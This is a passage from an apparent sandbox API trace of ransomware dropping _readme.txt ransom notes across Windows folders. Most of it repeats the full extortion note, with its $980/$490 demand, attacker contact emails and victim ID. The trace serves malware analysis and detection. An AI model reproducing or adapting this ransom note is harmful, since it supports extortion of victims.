have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.100] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.102] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.102] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0128.102] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.102] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.102] PathFindFileNameW (pszPath="") returned="" [0128.102] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.103] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0128.103] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 0 [0128.104] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.104] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.106] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.106] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0128.106] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0128.106] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.106] PathFindFileNameW (pszPath="") returned="" [0128.106] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.106] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0128.106] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0128.107] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.107] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.109] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.109] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.109] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.109] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.109] PathFindFileNameW (pszPath="") returned="" [0128.109] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0128.109] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0128.109] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 0 [0128.110] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0128.110] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0128.112] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.112] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.112] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.112] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.112] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.112] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0128.112] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.112] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.112] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.112] PathFindFileNameW (pszPath="") returned="" [0128.112] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.113] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\") returned="Application Data\\" [0128.113] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.113] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.113] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.113] PathFindFileNameW (pszPath="") returned="" [0128.114] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.114] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="Contacts\\" [0128.114] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.114] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.114] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.114] PathFindFileNameW (pszPath="") returned="" [0128.114] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.114] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\") returned="Cookies\\" [0128.114] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.114] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.114] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.115] PathFindFileNameW (pszPath="") returned="" [0128.115] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.115] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0128.115] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.115] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.115] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.115] PathFindFileNameW (pszPath="") returned="" [0128.115] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.115] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0128.115] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0128.116] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0128.116] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0128.116] PathFindFileNameW (pszPath="") returned="" [0128.116] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0128.116] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="Downloads\\" [0128.116] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" 